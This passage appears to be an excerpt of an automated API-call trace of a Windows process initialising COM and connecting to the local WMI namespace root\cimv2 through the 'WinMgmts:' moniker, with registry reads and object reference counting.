[7]=0x46)), ppv=0x1f810284 | out: ppv=0x1f810284*=0x7421a0) returned 0x0 [0212.959] IUnknown:QueryInterface (in: This=0x1f8121e8, riid=0x733a23cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fe1e318 | out: ppvObject=0x1fe1e318*=0x0) returned 0x80004002 [0212.965] CoGetContextToken (in: pToken=0x1fe1e328 | out: pToken=0x1fe1e328) returned 0x0 [0212.966] IUnknown:AddRef (This=0x1f8121e8) returned 0x4 [0212.966] IUnknown:QueryInterface (in: This=0x1f8121e8, riid=0x733f767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fe1e39c | out: ppvObject=0x1fe1e39c*=0x0) returned 0x80004002 [0212.969] IUnknown:Release (This=0x1f8121e8) returned 0x3 [0212.981] IUnknown:Release (This=0x1f8121e8) returned 0x2 [0212.982] CoGetContextToken (in: pToken=0x1fe1e79c | out: pToken=0x1fe1e79c) returned 0x0 [0212.983] CoGetContextToken (in: pToken=0x1fe1e75c | out: pToken=0x1fe1e75c) returned 0x0 [0212.983] IUnknown:AddRef (This=0x1f8121e8) returned 0x3 [0212.984] IUnknown:QueryInterface (in: This=0x1f8121e8, riid=0x1fe1e7d8*(Data1=0xe, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fe1e7d4 | out: ppvObject=0x1fe1e7d4*=0x1f8121e8) returned 0x0 [0212.986] IUnknown:Release (This=0x1f8121e8) returned 0x3 [0212.987] IUnknown:Release (This=0x1f8121e8) returned 0x2 [0212.988] IUnknown:Release (This=0x1f8121e8) returned 0x1 [0213.055] CoGetContextToken (in: pToken=0x1fe1e800 | out: pToken=0x1fe1e800) returned 0x0 [0213.055] CoGetContextToken (in: pToken=0x1fe1e7c0 | out: pToken=0x1fe1e7c0) returned 0x0 [0213.055] IUnknown:AddRef (This=0x1f8121e8) returned 0x2 [0213.056] IUnknown:QueryInterface (in: This=0x1f8121e8, riid=0x1fe1e83c*(Data1=0xe, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fe1e838 | out: ppvObject=0x1fe1e838*=0x1f8121e8) returned 0x0 [0213.057] IUnknown:Release (This=0x1f8121e8) returned 0x2 [0213.059] IUnknown:AddRef (This=0x1f8121e8) returned 0x3 [0213.060] MkParseDisplayName (in: pbc=0x1f8121e8, szUserName="WinMgmts:", pchEaten=0x1fe1eccc, ppmk=0x1fe1ec10 | out: pchEaten=0x1fe1eccc, ppmk=0x1fe1ec10*=0x1f825ed0) returned 0x0 [0214.216] malloc (_Size=0x80) returned 0xcce0d0 [0214.234] DllGetClassObject (in: rclsid=0x74db78*(Data1=0x172bddf8, Data2=0xceea, Data3=0x11d1, Data4=([0]=0x8b, [1]=0x5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0x6, [6]=0xd9, [7]=0xb6)), riid=0x1fe1e850*(Data1=0x11a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1fe1df08 | out: ppv=0x1fe1df08*=0x0) returned 0x80004002 [0214.235] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x22610810 [0214.235] ?WbemMemFree@CWin32DefaultArena@@SAHPAX@Z () returned 0x1 [0214.236] DllGetClassObject (in: rclsid=0x74db78*(Data1=0x172bddf8, Data2=0xceea, Data3=0x11d1, Data4=([0]=0x8b, [1]=0x5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0x6, [6]=0xd9, [7]=0xb6)), riid=0x7630ee84*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1fe1ea04 | out: ppv=0x1fe1ea04*=0x22610810) returned 0x0 [0214.236] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x22610810 [0214.237] WinMGMTS:IClassFactory:CreateInstance (in: This=0x22610810, pUnkOuter=0x0, riid=0x7630f084*(Data1=0x11a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fe1e9b0 | out: ppvObject=0x1fe1e9b0*=0x22610850) returned 0x0 [0214.244] GetVersionExW (in: lpVersionInformation=0x1fe1e7fc*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x7f, dwMinorVersion=0x36b7, dwBuildNumber=0x3, dwPlatformId=0x1fe1e860, szCSDVersion="塩盢\x08쀕") | out: lpVersionInformation=0x1fe1e7fc*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0214.244] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Wbem\\Scripting", ulOptions=0x0, samDesired=0x1, phkResult=0x1fe1e7f0 | out: phkResult=0x1fe1e7f0*=0x6ac) returned 0x0 [0214.245] RegQueryValueExW (in: hKey=0x6ac, lpValueName="Default Impersonation Level", lpReserved=0x0, lpType=0x0, lpData=0x1fe1e7f8, lpcbData=0x1fe1e7f4*=0x4 | out: lpType=0x0, lpData=0x1fe1e7f8*=0x3, lpcbData=0x1fe1e7f4*=0x4) returned 0x0 [0214.245] RegCloseKey (hKey=0x6ac) returned 0x0 [0214.245] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x22610828 [0214.245] GetSystemDirectoryW (in: lpBuffer=0x22610828, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0214.246] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\advapi32.dll", hFile=0x0, dwFlags=0x0) returned 0x754b0000 [0214.251] GetProcAddress (hModule=0x754b0000, lpProcName="DuplicateTokenEx") returned 0x754bca24 [0214.252] ?WbemMemFree@CWin32DefaultArena@@SAHPAX@Z () returned 0x1 [0214.264] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x22610828 [0214.269] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x22610850 [0214.270] WinMGMTS:IUnknown:Release (This=0x22610810) returned 0x0 [0214.270] ?WbemMemFree@CWin32DefaultArena@@SAHPAX@Z () returned 0x1 [0214.271] WinMGMTS:IParseDisplayName:ParseDisplayName (in: This=0x22610850, pbc=0x1f8121e8, pszDisplayName="WinMgmts:", pchEaten=0x1fe1ebc8, ppmkOut=0x1fe1ebcc | out: pchEaten=0x1fe1ebc8*=0x9, ppmkOut=0x1fe1ebcc*=0x1f825ed0) returned 0x0 [0214.271] _wcsnicmp (_String1="WinMgmts:", _String2="WINMGMTS:", _MaxCount=0x9) returned 0 [0214.276] IBindCtx:GetObjectParam (in: This=0x1f8121e8, pszKey="WmiObject", ppunk=0x1fe1ead0 | out: ppunk=0x1fe1ead0*=0x0) returned 0x80004005 [0214.276] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x22610860 [0214.277] _wcsnicmp (_String1="", _String2="{", _MaxCount=0x1) returned -123 [0214.277] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x22610880 [0214.278] CoCreateInstance (in: rclsid=0x73bb42b0*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x73bb42a0*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x22610898 | out: ppv=0x22610898*=0x226108e8) returned 0x0 [0214.902] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x226108f8 [0214.903] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x22610960 [0214.903] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x226109c0 [0214.904] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0214.909] GetCurrentThreadId () returned 0x474 [0214.929] _wcsnicmp (_String1="", _String2="[", _MaxCount=0x1) returned -91 [0214.929] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0214.934] GetCurrentThreadId () returned 0x474 [0214.948] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Wbem\\Scripting", ulOptions=0x0, samDesired=0x1, phkResult=0x1fe1e9b8 | out: phkResult=0x1fe1e9b8*=0x6b4) returned 0x0 [0214.948] RegQueryValueExW (in: hKey=0x6b4, lpValueName="Default Namespace", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1fe1e9c0*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1fe1e9c0*=0x16) returned 0x0 [0214.949] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x226109e0 [0214.949] RegQueryValueExW (in: hKey=0x6b4, lpValueName="Default Namespace", lpReserved=0x0, lpType=0x0, lpData=0x226109e0, lpcbData=0x1fe1e9c0*=0x16 | out: lpType=0x0, lpData=0x226109e0*=0x72, lpcbData=0x1fe1e9c0*=0x16) returned 0x0 [0214.949] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x22610a00 [0214.949] ?WbemMemFree@CWin32DefaultArena@@SAHPAX@Z () returned 0x1 [0214.950] RegCloseKey (hKey=0x6b4) returned 0x0 [0214.950] CoCreateInstance (in: rclsid=0x73bb53b8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x73bb50dc*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppv=0x1fe1e9ec | out: ppv=0x1fe1e9ec*=0x22610a20) returned 0x0 [0215.856] SysStringLen (param_1=".") returned 0x1 [0215.856] WbemDefPath:IWbemPath:SetServer (This=0x22610a20, Name=".") returned 0x0 [0215.857] CoCreateInstance (in: rclsid=0x73bb53b8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x73bb50dc*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppv=0x1fe1e9a4 | out: ppv=0x1fe1e9a4*=0x22610ab8) returned 0x0 [0215.858] CoCreateInstance (in: rclsid=0x73bb53b8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x73bb50dc*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppv=0x1fe1e948 | out: ppv=0x1fe1e948*=0x22610b50) returned 0x0 [0215.859] WbemDefPath:IWbemPath:SetText (This=0x22610b50, uMode=0x4, pszPath="root\\cimv2") returned 0x0 [0215.859] WbemDefPath:IUnknown:Release (This=0x22610b50) returned 0x0 [0215.859] SysStringLen (param_1="root\\cimv2") returned 0xa [0215.859] WbemDefPath:IWbemPath:SetText (This=0x22610ab8, uMode=0xc, pszPath="root\\cimv2") returned 0x0 [0215.860] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x22610ab8, puCount=0x1fe1e9b4 | out: puCount=0x1fe1e9b4*=0x2) returned 0x0 [0215.860] WbemDefPath:IWbemPath:RemoveAllNamespaces (This=0x22610a20) returned 0x0 [0215.860] WbemDefPath:IWbemPath:GetNamespaceAt (in: This=0x22610ab8, uIndex=0x0, puNameBufLength=0x1fe1e97c*=0x0, pName=0x0 | out: puNameBufLength=0x1fe1e97c*=0x5, pName=0x0) returned 0x0 [0215.860] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x22610b50 [0215.861] WbemDefPath:IWbemPath:GetNamespaceAt (in: This=0x22610ab8, uIndex=0x0, puNameBufLength=0x1fe1e97c*=0x5, pName="ಀ≡Ä≡" | out: puNameBufLength=0x1fe1e97c*=0x5, pName="root") returned 0x0 [0215.861] ?WbemMemFree@CWin32DefaultArena@@SAHPAX@Z () returned 0x1 [0215.861] WbemDefPath:IWbemPath:SetNamespaceAt (This=0x22610a20, uIndex=0x0, pszName="root") returned 0x0 [0215.862] WbemDefPath:IWbemPath:GetNamespaceAt (in: This=0x22610ab8, uIndex=0x1, puNameBufLength=0x1fe1e97c*=0x0, pName=0x0 | out: puNameBufLength=0x1fe1e97c*=0x6, pName=0x0) returned 0x0 [0215.862] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x22610ce8 [0215.862] WbemDefPath:IWbemPath:GetNamespaceAt (in: This=0x22610ab8, uIndex=0x1, puNameBufLength=0x1fe1e97c*=0x6, pName="Ä≡Ä≡2" | out: puNameBufLength=0x1fe1e97c*=0x6, pName="cimv2") returned 0x0 [0215.862] ?WbemMemFree@CWin32DefaultArena@@SAHPAX@Z () returned 0x1 [0215.863] WbemDefPath:IWbemPath:SetNamespaceAt (This=0x22610a20, uIndex=0x1, pszName="cimv2") returned 0x0 [0215.864] WbemDefPath:IUnknown:Release (This=0x22610ab8) returned 0x0 [0215.864] WbemDefPath:IWbemPath:GetText (in: This=0x22610a20, lFlags=4, puBuffLength=0x1fe1e9d0*=0x0, pszText=0x0 | out: puBuffLength=0x1fe1e9d0*=0xf, pszText=0x0) returned 0x0 [0215.866] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x22610ab8 [0215.867] WbemDefPath:IWbemPath:GetText (in: This=0x22610a20, lFlags=4, puBuffLength=0x1fe1e9d0*=0xf, pszText="୰≡ৠ≡2" | out: puBuffLength=0x1fe1e9d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0215.867] ?WbemMemFree@CWin32DefaultArena@@SAHPAX@Z () returned 0x1 [0215.868] WbemDefPath:IUnknown:Release (This=0x22610a20) returned 0x0 [0215.869] WbemLocator:IWbemLocator:ConnectServer (in: This=0x226108e8, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale=0x0, lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1fe1ea58 | out: ppNamespace=0x1fe1ea58*=0x2261d194) returned 0x0 [0222.792] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x2261c898 [0222.793] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x2261d1a8 [0222.793] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x2261d208 [0222.794] WbemLocator:IUnknown:QueryInterface (in: This=0x2261d194, riid=0x73bb31fc*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fe1e928 | out: ppvObject=0x1fe1e928*=0x1f83376c) returned 0x0 [0222.795] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x1f83376c, pProxy=0x2261d194, pAuthnSvc=0x1fe1e918, pAuthzSvc=0x1fe1e91c, pServerPrincName=0x0, pAuthnLevel=0x1fe1e944, pImpLevel=0x1fe1e940, pAuthInfo=0x0, pCapabilites=0x1fe1e930 | out: pAuthnSvc=0x1fe1e918*=0xa, pAuthzSvc=0x1fe1e91c*=0x0, pServerPrincName=0x0, pAuthnLevel=0x1fe1e944*=0x6, pImpLevel=0x1fe1e940*=0x2, pAuthInfo=0x0, pCapabilites=0x1fe1e930*=0x1) returned 0x0 [0222.796] WbemLocator:IUnknown:Release (This=0x1f83376c) returned 0x1 [0222.796] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0222.801] GetCurrentThreadId () returned 0x474 [0222.816] WbemLocator:IUnknown:QueryInterface (in: This=0x2261d194, riid=0x73bb31fc*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fe1e958 | out: ppvObject=0x1fe1e958*=0x1f83376c) returned 0x0 [0222.816] WbemLocator:IClientSecurity:CopyProxy (in: This=0x1f83376c, pProxy=0x2261d194, ppCopy=0x1fe1e95c | out: ppCopy=0x1fe1e95c*=0x2261d304) returned 0x0 [0222.821] WbemLocator:IUnknown:QueryInterface (in: This=0x2261d304, riid=0x73bb31fc*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fe1e874 | out: ppvObject=0x1fe1e874*=0x1f83376c) returned 0x0 [0222.822] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x1f83376c, pProxy=0x2261d304, pAuthnSvc=0x1fe1e898, pAuthzSvc=0x1fe1e888, pServerPrincName=0x0, pAuthnLevel=0x0, pImpLevel=0x0, pAuthInfo=0x0, pCapabilites=0x0 | out: pAuthnSvc=0x1fe1e898*=0xa, pAuthzSvc=0x1fe1e888*=0x0, pServerPrincName=0x0, pAuthnLevel=0x0, pImpLevel=0x0, pAuthInfo=0x0, pCapabilites=0x0) returned 0x0 [0222.822] WbemLocator:IUnknown:Release (This=0x1f83376c) returned 0x3 [0222.823] WbemLocator:IUnknown:QueryInterface (in: This=0x2261d304, riid=0x73bb34f0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fe1e84c | out: ppvObject=0x1fe1e84c*=0x1f83378c) returned 0x0 [0222.823] WbemLocator:IUnknown:QueryInterface (in: This=0x2261d304, riid=0x73bb31fc*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fe1e850 | out: ppvObject=0x1fe1e850*=0x1f83376c) returned 0x0 [0222.824] WbemLocator:IClientSecurity:SetBlanket (This=0x1f83376c, pProxy=0x2261d304, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0222.824] WbemLocator:IUnknown:Release (This=0x1f83376c) returned 0x4 [0222.825] WbemLocator:IUnknown:Release (This=0x1f83378c) returned 0x3 [0222.830] WbemLocator:IUnknown:Release (This=0x1f83376c) returned 0x2 [0222.835] WbemLocator:IUnknown:AddRef (This=0x2261d304) returned 0x3 [0222.840] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x2261d318 [0222.840] ?WbemMemAlloc@CWin32DefaultArena@@SAPAXK@Z () returned 0x2261c968 [0222.841] WbemLocator:IUnknown:Release (This=0x2261d194) returned 0x2 [0222.842] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0222.847] GetCurrentThreadId () returned 0x474 [0222.860] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0222.865] GetCurrentThreadId () returned 0x474 [0222.880] WbemLocator:IUnknown:QueryInterface (in: This=0x2261d304, riid=0x73bb31fc*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fe1ea1c | out: ppvObject=0x1fe1ea1c*=0x1f83376c) returned 0x0 [0222.881] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x1f83376c, pProxy=0x2261d304, pAuthnSvc=0x1fe1ea0c, pAuthzSvc=0x1fe1ea10, pServerPrincName=0x0, pAuthnLevel=0x1fe1ea3c, pImpLevel=0x1fe1ea40, pAuthInfo=0x0, pCapabilites=0x1fe1ea24 | out: pAuthnSvc=0x1fe1ea0c*=0xa, pAuthzSvc=0x1fe1ea10*=0x0, pServerPrincName=0x0, pAuthnLevel=0x1fe1ea3c*=0x6, pImpLevel=0x1fe1ea40*=0x3, pAuthInfo=0x0, pCapabilites=0x1fe1ea24*=0x20) returned 0x0 [0222.881] WbemLocator:IUnknown:Release (This=0x1f83376c) returned 0x2 [0222.882] CreatePointerMoniker (in: punk=0x2261c898, ppmk=0x1fe1ebcc | out: ppmk=0x1fe1ebcc*=0x1f825ed0) returned 0x0 [0222.882] IUnknown:AddRef (This=0x2261c898) returned 0x2 [0222.885] ?WbemMemFree@CWin32DefaultArena@@SAHPAX@Z () returned 0x1 [0222.885] ?WbemMemFree@CWin32DefaultArena@@SAHPAX@Z () returned 0x1 [0222.885] ?WbemMemFree@CWin32DefaultArena@@SAHPAX@Z () returned 0x1 [0222.886] WbemLocator:IUnknown:Release (This=0x226108e8) returned 0x0 [0222.886] ?WbemMemFree@CWin32DefaultArena@@SAHPAX@Z () returned 0x1 [0222.887] ?WbemMemFree@CWin32DefaultArena@@SAHPAX@Z () returned 0x1 [0222.888] WinMGMTS:IUnknown:Release (This=0x22610850) returned 0x0 [0222.889] ?WbemMemFree@CWin32DefaultArena@@SAHPAX@Z () returned 0x1 [0222.892] IUnknown:QueryInterface (in: This=0x1f825ed0, riid=0x734a7714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fe1e4c0 | out: ppvObject=0x1fe1e4c0*=0x1f825ed0) returned 0x0 [0222.903] IUnknown:QueryInterface (in: This=0x1f825ed0, riid=0x734c4204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1fe1e47c | out: ppvObject=0x1fe1e47c*=0x0) returned 0x80004002 [0222.904] IUnknown:QueryInterface (in: This=0x1f825ed0, riid=0x733f0b9c*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1fe1e370 | out: ppvObject=0x1fe1e370*=0x0) returned 0x80004002 [0222.920] IUnknown:AddRef (This=0x1f825ed0) returned 0x3 [0222.921] CoGetContextToken (in: pToken=0x1fe1e308 | out: pToken=0x1fe1e308) returned 0x0 [0222.922] CoGetContextToken (in: pToken=0x1fe1e2cc | out: pToken=0x1fe1e2cc) returned 0x0 [0222.922] IUnknown:QueryInterface (in: This=0x7421a0, riid=0x734c3ff0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fe1e300 | out: ppvObject=0x1fe1e300*=0x7421ac) returned 0x0 [0222.924] IComThreadingInfo:GetCurrentApartmentType (in: This=0x7421ac, pAptType=0x1fe1e330 | out: pAptType=0x1fe1e330*=3) returned 0x0 [0222.924] IUnknown:Release (This=0x7421ac) returned 0x1 [0222.925] IUnknown:QueryInterface (in: This=0x1f825ed0, riid=0x733a23cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fe1e2f0 | out: ppvObject=0x1fe1e2f0*=0x1f825ee4) returned 0x0 [0222.927] IMarshal:GetUnmarshalClass (in: This=0x1f825ee4, riid=0x734a7714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1fe1e2f8 | out: pCid=0x1fe1e2f8*(Data1=0x306, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0222.930] IUnknown:Release (This=0x1f825ee4) returned 0x3 [0222.937] CoGetContextToken (in: pToken=0x1fe1e300 | out: pToken=0x1fe1e300) returned 0x0 [0222.937] IUnknown:AddRef (This=0x1f825ed0) returned 0x4 [0222.938] IUnknown:QueryInterface (in: This=0x1f825ed0, riid=0x733f767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fe1e374 | out: ppvObject=0x1fe1e374*=0x0) returned 0x80004002 [0222.939] IUnknown:Release (This=0x1f825ed0) returned 0x3 [0222.950] IUnknown:Release (This=0x1f825ed0) returned 0x2 [0222.952] CoGetContextToken (in: pToken=0x1fe1e774 | out: pToken=0x1fe1e774) returned 0x0 [0222.993] CoGetContextToken (in: pToken=0x1fe1e734 | out: pToken=0x1fe1e734) returned 0x0 [0222.993] IUnknown:AddRef (This=0x1f825ed0) returned 0x3 [0222.994] IUnknown:QueryInterface (in: This=0x1f825ed0, riid=0x1fe1e7b0*(Data1=0xf, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fe1e7ac | out: ppvObject=0x1fe1e7ac*=0x1f825ed0) returned 0x0 [0222.996] IUnknown:Release (This=0x1f825ed0) returned 0x3 [0222.997] IUnknown:Release (This=0x1f825ed0) returned 0x2 [0222.998] IUnknown:Release (This=0x1f825ed0) returned 0x1 [0222.999] IUnknown:Release (This=0x1f8121e8) returned 0x2 [0223.063] CoGetContextToken (in: pToken=0x1fe1e800 | out: pToken=0x1fe1e800) returned 0x0 [0223.064] CoGetContextToken (in: pToken=0x1fe1e7c0 | out: pToken=0x1fe1e7c0) returned 0x0 [0223.064] IUnknown:AddRef (This=0x1f825ed0) returned 0x2 [0223.065] IUnknown:QueryInterface (in: This=0x1f825ed0, riid=0x1fe1e83c*(Data1=0xf, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fe1e838 | out: ppvObject=0x1fe1e838*=0x1f825ed0) returned 0x0 [0223.067] IUnknown:Release (This=0x1f825ed0) returned 0x2 [0223.068] IUnknown:AddRef (This=0x1f825ed0) returned 0x3 [0223.069] BindMoniker (in: pmk=0x1f825ed0, grfOpt=0x0, iidResult=0x201b0ce4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvResult=0x1fe1ec10 | out: ppvResult=0x1fe1ec10*=0x2261c898) returned 0x0 [0223.069] IUnknown:QueryInterface (in: This=0x2261c898, riid=0x201b0ce4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1fe1ec10 | out: ppvObject=0x1fe1ec10*=0x2261c898) returned 0x0 [0223.205] LoadRegTypeLib (in: rguid=0x73bb364c*(Data1=0x565783c6, Data2=0xcb41, Data3=0x11d1, Data4=([0]=0x8b, [1]=0x2, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0x6, [6]=0xd9, [7]=0xb6)), wVerMajor=0x1, wVerMinor=0x0, lcid=0x0, pptlib=0x1fe1e338*=0x0 | out: pptlib=0x1fe1e338*=0x1f7db530) returned 0x0 [0223.272] ITypeLib:GetTypeInfoOfGuid (in: This=0x1f7db530, GUID=0x2261c8dc*(Data1=0x62e522dc, Data2=0x8cf3, Data3=0x40a8, 